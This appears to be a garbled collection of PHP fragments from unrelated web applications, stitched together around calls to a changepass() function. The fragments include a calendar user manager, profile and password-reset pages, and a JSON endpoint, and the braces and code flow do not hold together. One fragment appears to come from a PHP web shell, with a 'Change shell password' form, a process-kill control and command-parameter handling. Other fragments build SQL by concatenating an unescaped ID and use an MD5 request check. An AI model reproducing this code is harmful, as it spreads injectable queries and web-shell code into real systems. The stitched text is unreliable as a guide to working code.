echo "<h4>" . translate("Updating user") . " ...</h4>";
$userdescription = addslashes(nl2br($userdesc));
$query = "update " . $USER_TB . " set password='******',group_id='{$usertype}',description='{$userdescription}' where user_id='" . $id . "'";
$result = mysql_query($query);
if ($userid == $id) {
$_SESSION["password"] = $cryptpass;
}
echo "<meta http-equiv=\"refresh\" content=\"0; url=cal_user.php?op=users\">";
}
switch ($op) {
// add new user
case "adduser":
adduserform();
break;
// change user password/group form
// change user password/group form
case "changepass":
changepass($userid);
break;
// change user password/group
// change user password/group
case "updateuser":
updateuser($id, $usertype, $passwd, $userdesc);
break;
// default: bar, and show new submissions
// default: bar, and show new submissions
default:
adduserform();
break;
}
include 'cal_footer.inc.php';
}
UserChangeInformation($UUser, $UAddress, $UPhone, $UEmail);
include 'view/user_profile.php';
break;
case 'show_department':
include 'view/department.php';
break;
case 'show_profile_different':
$_SESSION['view_people'] = $_GET['EId'];
include 'view/user_profile.php';
break;
case 'change_password':
$old = $_POST['opwd'];
$new1 = $_POST['pwd1'];
$new2 = $_POST['pwd2'];
changepass($_SESSION['is_valid'], $old, $new1, $new2);
include 'view/user_profile.php';
break;
case 'UserChangeImage':
if (isset($_POST['ok'])) {
if ($_FILES['file']['name'] != NULL) {
if ($_FILES['file']['type'] == "image/jpeg") {
if ($_FILES['file']['size'] > 10485760) {
echo "<script type='text/javascript'>alert('File không được lớn hơn 1Mb');</script>";
} else {
$path = "img\\employee\\";
$tmp_name = $_FILES['file']['tmp_name'];
$name = $_FILES['file']['name'];
$type = $_FILES['file']['type'];
$size = $_FILES['file']['size'];
// Upload file
}
}
}
$colspan = count($s_psln) + 1;
$s_result .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'>\n\t\t\t<form action='" . $s_self . "' method='post'><input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' /><label for='checkalll' class='css-label'></label></form>\n\t\t\t</td><td style='text-indent:10px;padding:2px;' colspan=" . $colspan . "><a href='javascript: pkill();'>kill selected <span id='total_selected'></span></a></td>\n\t\t\t</tr></tfoot></table>";
}
} elseif (isset($_GP['x']) && $_GP['x'] == 'pass') {
if (isset($_GP['submitnewpass'])) {
$newpass = isset($_GP['newpass']) ? trim($_GP['newpass']) : "";
$newpassx = isset($_GP['newpassx']) ? trim($_GP['newpassx']) : "";
if (empty($newpass) || empty($newpassx)) {
$s_result .= notif('Give your new password to both fields');
} elseif ($newpass != $newpassx) {
$s_result .= notif('Password does not match');
} else {
if (changepass($newpass)) {
$s_result .= notif("Password changed");
} else {
$s_result .= notif("Unable to change password");
}
}
}
$s_result .= "<div class='mybox'><h2>Change shell password</h2>\n\t\t\t<form action='" . $s_self . "' method='post' />\n\t\t\t<table class='myboxtbl'>\n\t\t\t<tr><td style='width:120px;'>New password</td><td><input style='width:100%;' class='inputz' type='password' name='newpass' value='' /></td></tr>\n\t\t\t<tr><td style='width:120px;'>Confirm password</td><td><input style='width:100%;' class='inputz' type='password' name='newpassx' value='' /></td></tr>\n\t\t\t</table>\n\t\t\t<input type='submit' name='submitnewpass' class='inputzbut' value='Go !' style='width:120px;height:30px;margin:10px 2px 0 2px;' />\n\t\t\t<input type='hidden' name='x' value='pass' />\n\t\t\t</form>\n\t\t\t</div>";
} else {
if (!isset($s_cwd)) {
$s_cwd = "";
}
if (isset($_GP['cmd'])) {
$s_cmd = $_GP['cmd'];
if (strlen($s_cmd) > 0) {
if (preg_match('#^cd(\\ )+(.*)#', $s_cmd, $s_r)) {
}
$private_key = $config['private_key'];
$hash = isset($_POST['hash']) ? $_POST['hash'] : 0;
$public_key = isset($_POST['public']) ? $_POST['public'] : 0;
$time = isset($_POST['t']) ? $_POST['t'] : 0;
$myhash = md5($public_key . $private_key . $time);
if ($hash != $myhash) {
echo json_encode(array('error' => '1', 'status' => $lang[215]));
exit;
}
$bool = false;
$op = isset($_POST['op']) ? $_POST['op'] : '';
$np1 = isset($_POST['np1']) ? $_POST['np1'] : '';
$np2 = isset($_POST['np2']) ? $_POST['np2'] : '';
// make sure these have value
if (!$op and !$np1 and !$np2) {
exit;
}
$bool = changepass($op, $np1, $np2, $user_id);
if ($bool == 'invalid old password') {
echo json_encode(array('error' => '1', 'status' => 'invalid', 'message' => $lang[338]));
exit;
} elseif ($bool == 'no match') {
echo json_encode(array('error' => '1', 'status' => 'invalid', 'message' => $lang[339]));
// new password did not match
exit;
} else {
$_SESSION['user_password'] = $bool;
echo json_encode(array('error' => '0', 'status' => 'success', 'message' => $lang[337]));
exit;
}
unset($lsdb_uname);
}
if (isset($_POST['pass']) && strlen($_POST['pass']) < 20) {
$lsdb_pass = strip_tags($_POST['pass']);
} else {
unset($lsdb_pass);
}
switch ($myop) {
case "logout":
logout();
break;
case "login":
_login($lsdb_uname, $lsdb_pass);
break;
case "chgpwd":
if (changepass() == 1) {
# _login($uname, $newpass1);
#userinfo($uname, $bypass);
die("<h3>Changed ...</h3>");
} else {
die("<h3>Error changing user values ...</h3>");
}
break;
default:
if (isset($usertoken)) {
user_main($usertoken);
} else {
user_main(array());
}
break;
}
}
mysql_close($conn);
?>
<script type="text/javascript">
document.title=document.title + " Change Password";
</script>
<div class="main_content">
<?php
include "leftwidget.php";
?>
<div class="center_table">
<?php
if ($action == 'change') {
changepass();
} else {
?>
<form action="chpasswd.php?sub=<?php
echo $subj;
?>
&act=change&t=<?php
echo $t;
?>
" onSubmit="return passwdmatch()" method="post">
<table width="600" border="0" cellspacing="0" cellpadding="0">
<?php
if ($subj == 'team') {
?>
<tr>
<th colspan="2" scope="col">Change Team Password</th>
}
function checkpass($Tab)
{
if (!preg_match('/^[a-zA-Z.-_*^!:;,&]{6,25}$/', $Tab['password'])) {
return "Mot de passe invalide, il doit être composé de 6 à 25 caractères.";
}
if ($Tab['password'] != $Tab['password2']) {
return "Mot de passe invalide , les deux mot de passes doivent correspondrent.";
}
return "NoError";
}
if ($_POST['change']) {
$error = checkpass($_POST);
if ($error != "NoError") {
echo "<div class='error' ><p class='error-txt' >" . $error . "</p></div>";
} else {
$error = changepass($_GET['mail'], $_GET['tok'], $_POST['password']);
if ($error == "ok") {
$_SESSION['msg'] = "<div class='success' ><p class='success-txt' >Mot de passe changé !</p></div>";
} else {
$_SESSION['msg'] = "<div class='success' ><p class='success-txt' >" . $error . "</p></div>";
}
header("Location : login.php");
}
}
require_once "../View/changepass.php";
?>
